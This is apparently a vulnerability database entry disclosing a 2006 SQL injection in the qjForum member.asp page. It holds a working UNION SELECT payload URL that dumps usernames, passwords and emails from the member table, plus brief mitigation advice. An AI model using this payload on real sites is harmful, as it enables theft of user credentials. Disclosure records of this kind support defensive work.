vendor:
qjForum
by:
ajann
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: qjForum
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006
qjForum(member.asp) SQL Injection Vulnerability
Login before injection. http://target/[path]/member.asp?uName='union%20select%200,0,0,username,0,0,pd,email,0,0,0,0,0,0,0,0,0,0,0,0%20from%20member
Mitigation:
Input validation, parameterized queries, and stored procedures can help prevent SQL injection attacks.